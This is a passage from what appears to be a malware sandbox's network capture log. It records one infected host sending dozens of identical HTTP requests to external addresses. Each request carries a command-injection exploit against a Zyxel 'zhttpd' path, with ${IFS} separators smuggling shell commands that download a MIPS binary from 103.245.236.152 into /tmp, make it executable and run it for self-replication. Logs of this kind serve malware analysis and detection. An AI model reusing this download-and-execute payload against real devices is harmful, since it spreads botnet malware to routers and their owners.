                                        Jan 14, 2024 16:18:49.561357021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5466192.168.2.133585843.38.238.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561386108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5467192.168.2.1347756156.204.236.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561431885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5468192.168.2.1346562136.46.239.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561494112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5469192.168.2.1343074218.54.199.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561528921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5470192.168.2.133574450.32.53.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561569929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5471192.168.2.1337124164.201.75.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561635971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5472192.168.2.1357778143.35.14.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561667919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5473192.168.2.1358886106.160.96.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561675072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5474192.168.2.134132297.9.143.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561729908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5475192.168.2.1353758183.112.244.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561753988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5476192.168.2.13410768.80.54.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561788082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5477192.168.2.135574249.233.170.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561825991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5478192.168.2.134807485.94.129.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561867952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5479192.168.2.1332990178.127.181.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561908960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5480192.168.2.133909235.235.57.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.561948061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5481192.168.2.135000058.120.9.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562006950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5482192.168.2.133610496.220.67.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562053919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5483192.168.2.134894096.9.197.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562103033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5484192.168.2.1336768125.56.76.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562138081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5485192.168.2.134930657.182.85.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562179089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5486192.168.2.1346058208.160.36.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562231064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5487192.168.2.1359482153.61.216.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562271118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5488192.168.2.135068084.146.205.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562297106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5489192.168.2.135844094.203.2.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562356949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5490192.168.2.1353772173.13.111.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562398911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5491192.168.2.133920684.131.23.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562455893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5492192.168.2.1353138100.153.28.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562479973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5493192.168.2.134649231.132.194.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562552929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5494192.168.2.1341448103.60.161.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562588930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5495192.168.2.1347252202.139.70.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562632084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5496192.168.2.1337308142.4.76.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562675953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5497192.168.2.1358260132.107.93.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562707901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5498192.168.2.134729435.131.205.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562760115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5499192.168.2.135976480.141.18.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562804937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5500192.168.2.133598249.157.118.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562822104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5501192.168.2.1360576140.70.49.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562863111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5502192.168.2.134326487.53.35.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562918901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5503192.168.2.1345676106.76.120.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562927961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5504192.168.2.133390290.149.252.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.562973022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5505192.168.2.1343514112.57.164.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563011885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5506192.168.2.1353840151.220.123.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563049078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5507192.168.2.135601469.95.13.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563086987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5508192.168.2.133457262.197.155.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563142061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5509192.168.2.1359114221.113.101.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563174963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5510192.168.2.134090217.23.233.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563229084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5511192.168.2.135456486.231.50.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563263893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5512192.168.2.134499819.250.46.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563323021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5513192.168.2.134722836.228.145.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563361883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5514192.168.2.1348980135.165.198.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563424110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5515192.168.2.1335490205.68.50.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563441992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5516192.168.2.1358060222.90.169.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563494921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5517192.168.2.1358686136.127.12.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563527107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5518192.168.2.1355060167.92.56.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563580036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5519192.168.2.134525086.230.12.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563618898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5520192.168.2.1359738164.93.16.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563673973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5521192.168.2.1333644182.23.233.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563709974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5522192.168.2.1356620142.113.56.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563747883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5523192.168.2.133527448.36.57.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563816071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5524192.168.2.1354902212.176.155.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563834906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5525192.168.2.1337628142.106.233.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563883066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5526192.168.2.1335220178.7.232.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563914061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5527192.168.2.1338972144.252.204.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.563947916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5528192.168.2.1341050176.174.36.110443
                                        TimestampBytes transferredDirectionData
